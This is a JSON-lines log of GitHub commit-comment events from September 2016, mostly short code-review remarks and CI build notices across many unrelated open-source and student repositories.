{"id":"4637619445","type":"CommitCommentEvent","actor":{"login":"Ravenwolfe"},"repo":{"name":"ServUO/ServUO"},"payload":{"comment":{"id":19224742,"position":null,"line":null,"path":null,"commit_id":"255f58c2109edf1e069ee588696233eedc9e783d","created_at":"2016-09-29T14:31:33Z","updated_at":"2016-09-29T14:31:33Z","body":"I added the quiver and check for SetID on quiver, but I dont understand why\nyou want it to return false on Artifacts. On OSI you can alter artifacts.\n\nOn Wed, Sep 28, 2016 at 9:46 PM, Argalep <notifications@github.com> wrote:\n\n> hi raven,\n>\n> please add to\n>\n> if (item is BaseQuiver)\n> {\n> BaseQuiver quiver = (BaseQuiver)item;\n>\n>             if (quiver.SetID != SetItem.None)\n>                 return false;\n>\n>             if (quiver.IsArtifact)\n>                 return false;\n>         }\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ServUO/ServUO/commit/255f58c2109edf1e069ee588696233eedc9e783d#commitcomment-19218098>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFhrv0lxmXk9eR-EfLPWXHJa1PnFV224ks5quyZugaJpZM4KJhk8>\n> .\n>\n"}},"created_at":"2016-09-29T14:31:33Z"}
{"id":"4637620077","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19224744,"position":13,"line":19,"path":"libselinux/src/sha1.c","commit_id":"4a5bf46a7fe1ea2a529d4e893136fd1e4ef52ec7","created_at":"2016-09-29T14:31:38Z","updated_at":"2016-09-29T14:31:38Z","body":"typo (inttel)"}},"created_at":"2016-09-29T14:31:38Z"}
{"id":"4637621967","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224753,"position":15,"line":137,"path":"editor/js/ui/common/tabs.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:31:56Z","updated_at":"2016-09-29T14:31:56Z","body":"I think no need for those lines too. RED.text.numericShaping.shape(tab.label) would be enough. \r\nplz verify."}},"created_at":"2016-09-29T14:31:56Z"}
{"id":"4637622677","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimEssentials"},"payload":{"comment":{"id":19224756,"position":null,"line":null,"path":null,"commit_id":"01ebde96e629a0ee2358a1691a3efeb933ed441b","created_at":"2016-09-29T14:32:03Z","updated_at":"2016-09-29T14:32:03Z","body":"TeamCity Xbim :: Xbim Essentials :: XbimEssentials [Build 439](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1269&buildTypeId=XbimEssentials_XbimEssentials) outcome was **SUCCESS**\nSummary: Running Build time: 00:02:02"}},"created_at":"2016-09-29T14:32:03Z"}
{"id":"4637624042","type":"CommitCommentEvent","actor":{"login":"mikeedwards83"},"repo":{"name":"mikeedwards83/Glass.Mapper"},"payload":{"comment":{"id":19224761,"position":null,"line":null,"path":null,"commit_id":"470d88c3ab3e14dba1a4edff3ca86baf42e2b175","created_at":"2016-09-29T14:32:15Z","updated_at":"2016-09-29T14:32:15Z","body":"Updated, should be in the nightly alpha tomorrow. "}},"created_at":"2016-09-29T14:32:15Z"}
{"id":"4637624884","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224764,"position":1,"line":1,"path":"final_LL/print/js/print.js","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:32:23Z","updated_at":"2016-09-29T14:32:23Z","body":"Nice work separating this out into its own file. "}},"created_at":"2016-09-29T14:32:23Z"}
{"id":"4637624982","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19224765,"position":46,"line":43,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"97ba35fc2dd260c7adefe91c8e10e8d947a03c61","created_at":"2016-09-29T14:32:23Z","updated_at":"2016-09-29T14:32:23Z","body":"Não precisa, só gostaria de entender pq colocou. O correto mesmo seria\ngarantir que o objeto nem fosse criado se o nome fosse nulo.\n\n2016-09-29 11:07 GMT-03:00 LeonardoAlmeida96 <notifications@github.com>:\n\n> Tenho por costume fazer validação de campos obrigatórios. Retirar ?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/LeonardoAlmeida96/crescer-2016-2/commit/97ba35fc2dd260c7adefe91c8e10e8d947a03c61#commitcomment-19224314>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAgG-8_lmUv0bM6ECKMpn1oGjCAJxUiZks5qu8YWgaJpZM4KKBq6>\n> .\n>\n\n\n\n-- \nBernardo Bosak de Rezende\nhttp://bernardobrezende.github.io - GitHub\n\n\"The weather-cock on the church spire, though made of iron, would soon be\nbroken by the storm-wind if it did not understand the noble art of turning\nto every wind.\"\nHeinrich Heine\n"}},"created_at":"2016-09-29T14:32:23Z"}
{"id":"4637625701","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224769,"position":12,"line":322,"path":"editor/js/ui/editor.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:32:30Z","updated_at":"2016-09-29T14:32:30Z","body":"!!"}},"created_at":"2016-09-29T14:32:30Z"}
{"id":"4637625815","type":"CommitCommentEvent","actor":{"login":"misson20000"},"repo":{"name":"LEGOlord208/PixelCamMod"},"payload":{"comment":{"id":19224770,"position":null,"line":null,"path":null,"commit_id":"4eaeaf263630d1d20951380439efca58a1cbe3d2","created_at":"2016-09-29T14:32:31Z","updated_at":"2016-09-29T14:32:31Z","body":"Umm, what? This commit fixes a problem where the camera will look like it's spinning really really fast when it's pointing in certain directions. It's a completely client-side bug. "}},"created_at":"2016-09-29T14:32:31Z"}
{"id":"4637626470","type":"CommitCommentEvent","actor":{"login":"rhcarvalho"},"repo":{"name":"sclorg/mongodb-container"},"payload":{"comment":{"id":19224774,"position":142,"line":142,"path":"2.4/examples/petset/README.md","commit_id":"70fd83a8f8c74a1e5162f27852e81fdb2f3b7aea","created_at":"2016-09-29T14:32:37Z","updated_at":"2016-09-29T14:32:37Z","body":"Added link to petset clean up and MongoDB on how to remove a member from config."}},"created_at":"2016-09-29T14:32:37Z"}
{"id":"4637627230","type":"CommitCommentEvent","actor":{"login":"stympy"},"repo":{"name":"honeybadger-io/honeybadger-ruby"},"payload":{"comment":{"id":19224775,"position":null,"line":null,"path":null,"commit_id":"76f5dcb725585e0478a1ad7a1f2114ca3cf7da47","created_at":"2016-09-29T14:32:44Z","updated_at":"2016-09-29T14:32:44Z","body":"👍 "}},"created_at":"2016-09-29T14:32:44Z"}
{"id":"4637627955","type":"CommitCommentEvent","actor":{"login":"NicolasPetton"},"repo":{"name":"foretagsplatsen/emacs-js"},"payload":{"comment":{"id":19224776,"position":null,"line":null,"path":null,"commit_id":"68f57c86ba9a212049b13f7582efde1c7ecb2ffe","created_at":"2016-09-29T14:32:50Z","updated_at":"2016-09-29T14:32:50Z","body":"Look like it, yes."}},"created_at":"2016-09-29T14:32:50Z"}
{"id":"4637628089","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224777,"position":21,"line":1226,"path":"editor/js/ui/editor.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:32:52Z","updated_at":"2016-09-29T14:32:52Z","body":"plz remove '//'"}},"created_at":"2016-09-29T14:32:52Z"}
{"id":"4637628185","type":"CommitCommentEvent","actor":{"login":"malte0811"},"repo":{"name":"malte0811/IndustrialWires"},"payload":{"comment":{"id":19224778,"position":4,"line":4,"path":"changelog.md","commit_id":"c6c0bb00c9fd27f9c22b6c15f1fd5b35a551db4e","created_at":"2016-09-29T14:32:53Z","updated_at":"2016-09-29T14:32:53Z","body":"@mindforger: There you go, I will put the new build on Curse once Blu releases IE build 43 (I need BluSunrize/ImmersiveEngineering@2bb8a1988cb5e7d031d653042ab55f1e658c245e)"}},"created_at":"2016-09-29T14:32:53Z"}
{"id":"4637629699","type":"CommitCommentEvent","actor":{"login":"bobbilee19"},"repo":{"name":"kristenmkarcher/blocmarks"},"payload":{"comment":{"id":19224782,"position":6,"line":6,"path":"app/models/user.rb","commit_id":"47cdfb2353869952db341e4c5c3bddb2369444d0","created_at":"2016-09-29T14:33:07Z","updated_at":"2016-09-29T14:33:07Z","body":"in order to have the email working u need to uncomment the confirmable, which we went over."}},"created_at":"2016-09-29T14:33:07Z"}
{"id":"4637630066","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224783,"position":22,"line":1227,"path":"editor/js/ui/editor.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:33:10Z","updated_at":"2016-09-29T14:33:10Z","body":"plz remove that line"}},"created_at":"2016-09-29T14:33:10Z"}
{"id":"4637636304","type":"CommitCommentEvent","actor":{"login":"dustinmm80"},"repo":{"name":"conjurinc/api-python"},"payload":{"comment":{"id":19224795,"position":45,"line":22,"path":"examples/petstore/docker-compose.yml","commit_id":"a354f54538c8fd8468addc2f0ad1c35d85570b8d","created_at":"2016-09-29T14:34:10Z","updated_at":"2016-09-29T14:34:10Z","body":"I understand what you're trying to do here, get rid of the Python dependency. But this example is for Python programmers - moving everything into Docker makes the example (how its parts fit together) much harder to understand. \r\n\r\nI propose instead that I add a note to the README showing how to set up a virtualenv for this example (which almost all Python devs know how to do). That will isolate the Python environment"}},"created_at":"2016-09-29T14:34:10Z"}
{"id":"4637636381","type":"CommitCommentEvent","actor":{"login":"lizzyt421"},"repo":{"name":"lizzyt421/Csharp-fall16"},"payload":{"comment":{"id":19224797,"position":null,"line":null,"path":null,"commit_id":"0d39e4cea5c2e1180a7fb8e65fabb5439209c816","created_at":"2016-09-29T14:34:10Z","updated_at":"2016-09-29T14:34:10Z","body":"I am going to bring my laptop to class tonight and ask you to help me because this is all super new.  I downloaded the desktop app and Visual Studio extension.  But I still need help with other things. "}},"created_at":"2016-09-29T14:34:10Z"}
{"id":"4637636724","type":"CommitCommentEvent","actor":{"login":"dsomel21"},"repo":{"name":"werein/react"},"payload":{"comment":{"id":19224798,"position":null,"line":null,"path":null,"commit_id":"49387a6b5680c14c64308108418420ed8ff14ca0","created_at":"2016-09-29T14:34:13Z","updated_at":"2016-09-29T14:34:13Z","body":"Hey man, I am trouble understanding how to run the react and express server? I want React to be able to make calls to the API? But if I run `npm start` it runs the webpack server but it has no access to the DAMN express routes. What was the point of this then?!"}},"created_at":"2016-09-29T14:34:13Z"}
{"id":"4637636768","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224799,"position":3,"line":3,"path":"final_LL/js/common.js","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:34:13Z","updated_at":"2016-09-29T14:34:13Z","body":"You're using hasOwnProperty correctly, but a deep understanding of what this one line is doing should significantly improve your command of JS. I had to help a \"senior\" dev twice when he was iterating over objects because he had failed to include this line. "}},"created_at":"2016-09-29T14:34:13Z"}
{"id":"4637637133","type":"CommitCommentEvent","actor":{"login":"vvo"},"repo":{"name":"algolia/autocomplete.js"},"payload":{"comment":{"id":19224801,"position":null,"line":null,"path":null,"commit_id":"47c1731c27bbd78bce4f35cd66ab35ccdb43f0bf","created_at":"2016-09-29T14:34:17Z","updated_at":"2016-09-29T14:34:17Z","body":"Yes that also there is no reason to really use zepto in docsearch (neither in autocomplete.js, but here it's deeply linked)"}},"created_at":"2016-09-29T14:34:17Z"}
{"id":"4637637760","type":"CommitCommentEvent","actor":{"login":"vvo"},"repo":{"name":"algolia/autocomplete.js"},"payload":{"comment":{"id":19224803,"position":null,"line":null,"path":null,"commit_id":"47c1731c27bbd78bce4f35cd66ab35ccdb43f0bf","created_at":"2016-09-29T14:34:22Z","updated_at":"2016-09-29T14:34:22Z","body":"submitted a PR"}},"created_at":"2016-09-29T14:34:22Z"}
{"id":"4637638521","type":"CommitCommentEvent","actor":{"login":"Floris497"},"repo":{"name":"Floris497/mac-pixel-clock-patch-V2"},"payload":{"comment":{"id":19224805,"position":null,"line":null,"path":null,"commit_id":"660a0dbec1ea4055d4404d4bc6d2ecb0c820e033","created_at":"2016-09-29T14:34:30Z","updated_at":"2016-09-29T14:34:30Z","body":"Undo the patch, boot in recovery or single user mode if possible and go to the directory where the patch CoreDisplay file is then move the backup file over the patched file. "}},"created_at":"2016-09-29T14:34:30Z"}
{"id":"4637640430","type":"CommitCommentEvent","actor":{"login":"Floris497"},"repo":{"name":"Floris497/mac-pixel-clock-patch-V2"},"payload":{"comment":{"id":19224810,"position":null,"line":null,"path":null,"commit_id":"660a0dbec1ea4055d4404d4bc6d2ecb0c820e033","created_at":"2016-09-29T14:34:48Z","updated_at":"2016-09-29T14:34:48Z","body":"At this moment it seems like some systems give problems "}},"created_at":"2016-09-29T14:34:48Z"}
{"id":"4637641868","type":"CommitCommentEvent","actor":{"login":"xchapter7x"},"repo":{"name":"enaml-ops/pluginlib"},"payload":{"comment":{"id":19224811,"position":63,"line":63,"path":"cred/vault.go","commit_id":"ede33f4d06ee5a05e4080ffa303a8fc94fecf93d","created_at":"2016-09-29T14:35:01Z","updated_at":"2016-09-29T14:35:01Z","body":"pull these up into the method comments if we think its important to a consumer of this Method, or lets just remove them."}},"created_at":"2016-09-29T14:35:01Z"}
{"id":"4637642840","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224815,"position":6,"line":6,"path":"final_LL/js/common.js","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:35:10Z","updated_at":"2016-09-29T14:35:10Z","body":"I think you would have been better served with regular if statements here. The double ternary operators are really difficult to read. "}},"created_at":"2016-09-29T14:35:10Z"}
{"id":"4637642935","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19224816,"position":3,"line":3,"path":"README.md","commit_id":"bbc4f47380390a5855b786efa645eceb4fc40edb","created_at":"2016-09-29T14:35:10Z","updated_at":"2016-09-29T14:35:10Z","body":"hello"}},"created_at":"2016-09-29T14:35:10Z"}
{"id":"4637643622","type":"CommitCommentEvent","actor":{"login":"suleymasd"},"repo":{"name":"suleymasd/yaz"},"payload":{"comment":{"id":19224818,"position":null,"line":null,"path":null,"commit_id":"2edd598e394ef6e0cc03af08f1c5f6132c04d2ac","created_at":"2016-09-29T14:35:16Z","updated_at":"2016-09-29T14:35:16Z","body":"kkl"}},"created_at":"2016-09-29T14:35:16Z"}
{"id":"4637644653","type":"CommitCommentEvent","actor":{"login":"thc202"},"repo":{"name":"thc202/zaproxy"},"payload":{"comment":{"id":19224821,"position":4,"line":16,"path":"test/resources/org/zaproxy/zap/spider/parser/CommentWithoutElementsSpiderHtmlParser.html","commit_id":"b1d477fa97ad882f7f2d3be8128b9e770f0f2e67","created_at":"2016-09-29T14:35:25Z","updated_at":"2016-09-29T14:35:25Z","body":"Yeah, we could exclude those too (although I guess those are less likely to happen?)."}},"created_at":"2016-09-29T14:35:25Z"}
{"id":"4637645020","type":"CommitCommentEvent","actor":{"login":"bobbilee19"},"repo":{"name":"kristenmkarcher/blocmarks"},"payload":{"comment":{"id":19224826,"position":1,"line":1,"path":"config/secrets.yml","commit_id":"47cdfb2353869952db341e4c5c3bddb2369444d0","created_at":"2016-09-29T14:35:28Z","updated_at":"2016-09-29T14:35:28Z","body":"nothing in the config should be here. I should not see this file. look at old projects to seee what should be in the gitignore and read up on the gitignore file"}},"created_at":"2016-09-29T14:35:28Z"}
{"id":"4637645330","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19224827,"position":null,"line":null,"path":null,"commit_id":"bbc4f47380390a5855b786efa645eceb4fc40edb","created_at":"2016-09-29T14:35:31Z","updated_at":"2016-09-29T14:35:31Z","body":"hello world."}},"created_at":"2016-09-29T14:35:31Z"}
{"id":"4637645496","type":"CommitCommentEvent","actor":{"login":"antonhallstrom"},"repo":{"name":"antonhallstrom/hejhej"},"payload":{"comment":{"id":19224828,"position":null,"line":null,"path":null,"commit_id":"1c81ace5966e2acfb00f2eeb389d986b45030872","created_at":"2016-09-29T14:35:33Z","updated_at":"2016-09-29T14:35:33Z","body":"dkdkdk"}},"created_at":"2016-09-29T14:35:33Z"}
{"id":"4637645923","type":"CommitCommentEvent","actor":{"login":"xchapter7x"},"repo":{"name":"enaml-ops/pluginlib"},"payload":{"comment":{"id":19224829,"position":94,"line":94,"path":"cred/vault.go","commit_id":"ede33f4d06ee5a05e4080ffa303a8fc94fecf93d","created_at":"2016-09-29T14:35:37Z","updated_at":"2016-09-29T14:35:37Z","body":"so why are we even doing this? cant we just remove this whole thing?\r\n\r\nthat and a i really hate comments :)"}},"created_at":"2016-09-29T14:35:37Z"}
{"id":"4637646420","type":"CommitCommentEvent","actor":{"login":"davisking"},"repo":{"name":"mit-nlp/MITIE"},"payload":{"comment":{"id":19224833,"position":5,"line":1057,"path":"mitielib/include/mitie.h","commit_id":"5e65ef606747d0e1df61d93d069a7df10352b818","created_at":"2016-09-29T14:35:42Z","updated_at":"2016-09-29T14:35:42Z","body":"Is each element of the array an individual word? :)"}},"created_at":"2016-09-29T14:35:42Z"}
{"id":"4637647779","type":"CommitCommentEvent","actor":{"login":"bobbilee19"},"repo":{"name":"kristenmkarcher/blocmarks"},"payload":{"comment":{"id":19224837,"position":22,"line":22,"path":"db/migrate/20160928031229_devise_create_users.rb","commit_id":"47cdfb2353869952db341e4c5c3bddb2369444d0","created_at":"2016-09-29T14:35:55Z","updated_at":"2016-09-29T14:35:55Z","body":"pretty sure u should have the uncommented in order to get the emails working"}},"created_at":"2016-09-29T14:35:55Z"}
{"id":"4637648060","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224839,"position":null,"line":null,"path":null,"commit_id":"ae7695929c2b6168166e21513d862bd37b5f02d4","created_at":"2016-09-29T14:35:58Z","updated_at":"2016-09-29T14:35:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1197](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14559&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T14:35:58Z"}
{"id":"4637651716","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19224848,"position":73,"line":73,"path":"final_LL/js/common.js","commit_id":"a81265a65b6901ec4ddfd073541be1a8a65ffe5c","created_at":"2016-09-29T14:36:31Z","updated_at":"2016-09-29T14:36:31Z","body":"make sure to put event.preventDefault in this handler and the next. If you leave them out, the page jumps to the top. "}},"created_at":"2016-09-29T14:36:31Z"}
{"id":"4637654531","type":"CommitCommentEvent","actor":{"login":"s-hajir"},"repo":{"name":"s-hajir/Projekt1-PRG"},"payload":{"comment":{"id":19224852,"position":null,"line":null,"path":null,"commit_id":"6e87ac1675b81b542f76b5fddf6ef9367111d384","created_at":"2016-09-29T14:36:57Z","updated_at":"2016-09-29T14:36:57Z","body":"dieses Formular wird nicht direkt abgeschickt, sondern in Javascript per AJAX"}},"created_at":"2016-09-29T14:36:57Z"}
{"id":"4637654630","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19224853,"position":null,"line":null,"path":null,"commit_id":"bbc4f47380390a5855b786efa645eceb4fc40edb","created_at":"2016-09-29T14:36:57Z","updated_at":"2016-09-29T14:36:57Z","body":"\r\n![koala](https://cloud.githubusercontent.com/assets/14124039/18958429/3c8b038c-8680-11e6-9f46-a693277efe0f.jpg)\r\n"}},"created_at":"2016-09-29T14:36:57Z"}
{"id":"4637655709","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19224857,"position":36,"line":76,"path":"libselinux/src/Makefile","commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T14:37:08Z","updated_at":"2016-09-29T14:37:08Z","body":"Is this really a function of Darwin vs non-Darwin, or the compiler?"}},"created_at":"2016-09-29T14:37:08Z"}
{"id":"4637656991","type":"CommitCommentEvent","actor":{"login":"karkinge"},"repo":{"name":"HFScode/zspin"},"payload":{"comment":{"id":19224861,"position":null,"line":null,"path":null,"commit_id":"57e920217ef903a976d34c7e22e32ed0d27b0c9b","created_at":"2016-09-29T14:37:19Z","updated_at":"2016-09-29T14:37:19Z","body":"when the event is fired, the theme is requested to perform the animations, using selectively swf2js, or gsap.\r\nSample converted theme here : [](http://k4rk.ddns.info/themeconvert/themes/ddonpach/ddonpach.zip)"}},"created_at":"2016-09-29T14:37:19Z"}
{"id":"4637657466","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19224863,"position":42,"line":82,"path":"libselinux/src/Makefile","commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T14:37:24Z","updated_at":"2016-09-29T14:37:24Z","body":"What is /opt/local and why do we need it here?"}},"created_at":"2016-09-29T14:37:24Z"}
{"id":"4637657743","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224866,"position":5,"line":1806,"path":"editor/js/ui/view.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:37:26Z","updated_at":"2016-09-29T14:37:26Z","body":"plz remove '//'"}},"created_at":"2016-09-29T14:37:26Z"}
{"id":"4637663716","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224882,"position":null,"line":null,"path":null,"commit_id":"ae7695929c2b6168166e21513d862bd37b5f02d4","created_at":"2016-09-29T14:38:20Z","updated_at":"2016-09-29T14:38:20Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1198](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14564&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T14:38:20Z"}
{"id":"4637666132","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19224887,"position":40,"line":39,"path":"libselinux/utils/Makefile","commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T14:38:41Z","updated_at":"2016-09-29T14:38:41Z","body":"Wondering if we can/should centralize these definitions in the top-level libselinux makefile and inherit them down?"}},"created_at":"2016-09-29T14:38:41Z"}
{"id":"4637668557","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19224898,"position":88,"line":419,"path":"xwiki-platform-core/xwiki-platform-security/xwiki-platform-security-api/src/main/java/org/xwiki/security/authorization/cache/internal/DefaultSecurityCache.java","commit_id":"eb423423fb234b4104de350ce608eabf58aea225","created_at":"2016-09-29T14:39:03Z","updated_at":"2016-09-29T14:39:03Z","body":"what should we do when this happens? Should the wiki continue to operate? If not, then we should throw an exception probably. If it's ok, then maybe it should be a warning instead?"}},"created_at":"2016-09-29T14:39:03Z"}
{"id":"4637668641","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19224899,"position":null,"line":null,"path":null,"commit_id":"bbc4f47380390a5855b786efa645eceb4fc40edb","created_at":"2016-09-29T14:39:04Z","updated_at":"2016-09-29T14:39:04Z","body":"hello"}},"created_at":"2016-09-29T14:39:04Z"}
{"id":"4637668779","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19224901,"position":null,"line":null,"path":null,"commit_id":"9a30d1e6b7ca9836ab0c675cb650bcdfd210317f","created_at":"2016-09-29T14:39:05Z","updated_at":"2016-09-29T14:39:05Z","body":"Is it truly necessary to DISABLE_CIL=y still or is that statement in your description no longer valid?"}},"created_at":"2016-09-29T14:39:05Z"}
{"id":"4637669166","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224904,"position":87,"line":87,"path":"editor/js/text/numeric-shaping.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:39:08Z","updated_at":"2016-09-29T14:39:08Z","body":"remove those commented lines.\r\nAdd  `text = new String(text);`"}},"created_at":"2016-09-29T14:39:08Z"}
{"id":"4637673604","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224913,"position":null,"line":null,"path":null,"commit_id":"80da206ca69a278e546f94f1cac94dba0bff3103","created_at":"2016-09-29T14:39:51Z","updated_at":"2016-09-29T14:39:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1199](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14565&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T14:39:51Z"}
{"id":"4637673655","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224914,"position":5,"line":142,"path":"editor/js/ui/subflow.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:39:51Z","updated_at":"2016-09-29T14:39:51Z","body":"remove` .toString() ` call.  no need for it."}},"created_at":"2016-09-29T14:39:51Z"}
{"id":"4637674768","type":"CommitCommentEvent","actor":{"login":"norkans7"},"repo":{"name":"nyaruka/rapidpro"},"payload":{"comment":{"id":19224918,"position":5,"line":1909,"path":"temba/api/tests/test_v2.py","commit_id":"f3b3ccc0fcccfd51a37ca6e3608efd0a1ec92bb9","created_at":"2016-09-29T14:40:02Z","updated_at":"2016-09-29T14:40:02Z","body":"joe_run2 was created before frank_run2 so I think this is right"}},"created_at":"2016-09-29T14:40:02Z"}
{"id":"4637676476","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224924,"position":5,"line":97,"path":"editor/js/ui/workspaces.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:40:18Z","updated_at":"2016-09-29T14:40:18Z","body":"remove this line"}},"created_at":"2016-09-29T14:40:18Z"}
{"id":"4637679511","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224926,"position":24,"line":229,"path":"editor/js/ui/workspaces.js","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:40:45Z","updated_at":"2016-09-29T14:40:45Z","body":"remove this line"}},"created_at":"2016-09-29T14:40:45Z"}
{"id":"4637679799","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19224927,"position":null,"line":null,"path":null,"commit_id":"7e9b228122a4f79f4fbb773b8aaaf43ade742010","created_at":"2016-09-29T14:40:47Z","updated_at":"2016-09-29T14:40:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1196](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14558&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:11:03"}},"created_at":"2016-09-29T14:40:47Z"}
{"id":"4637680711","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19224930,"position":null,"line":null,"path":null,"commit_id":"b9cf678367c7a7cec35e972ecc4505b19be40bd3","created_at":"2016-09-29T14:40:56Z","updated_at":"2016-09-29T14:40:56Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33676/testReport/) for this commit**"}},"created_at":"2016-09-29T14:40:56Z"}
{"id":"4637681640","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224935,"position":5,"line":109,"path":"nodes/core/core/58-debug.html","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:41:05Z","updated_at":"2016-09-29T14:41:05Z","body":"plz remove '//'"}},"created_at":"2016-09-29T14:41:05Z"}
{"id":"4637682618","type":"CommitCommentEvent","actor":{"login":"AhmedMustafa"},"repo":{"name":"samarsultan/node-red"},"payload":{"comment":{"id":19224941,"position":14,"line":123,"path":"nodes/core/core/58-debug.html","commit_id":"f37db1ddade437217ced371217f8edee45c481c0","created_at":"2016-09-29T14:41:13Z","updated_at":"2016-09-29T14:41:13Z","body":"!!"}},"created_at":"2016-09-29T14:41:13Z"}
